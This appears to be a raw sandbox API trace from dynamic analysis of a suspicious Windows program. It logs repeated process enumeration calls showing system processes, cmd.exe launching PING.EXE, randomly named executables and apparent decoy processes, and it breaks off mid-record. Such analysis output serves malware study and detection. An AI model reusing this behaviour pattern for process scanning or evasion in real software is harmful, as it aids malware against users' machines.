Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.347] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0102.348] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.349] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.350] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0102.351] CloseHandle (hObject=0xbc) returned 1 [0102.351] Sleep (dwMilliseconds=0x12c) [0102.673] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0102.677] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.680] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.701] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.704] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.707] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.708] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.762] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.768] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.771] CloseHandle (hObject=0xc4) returned 1 [0102.771] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0102.777] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.786] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.787] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, 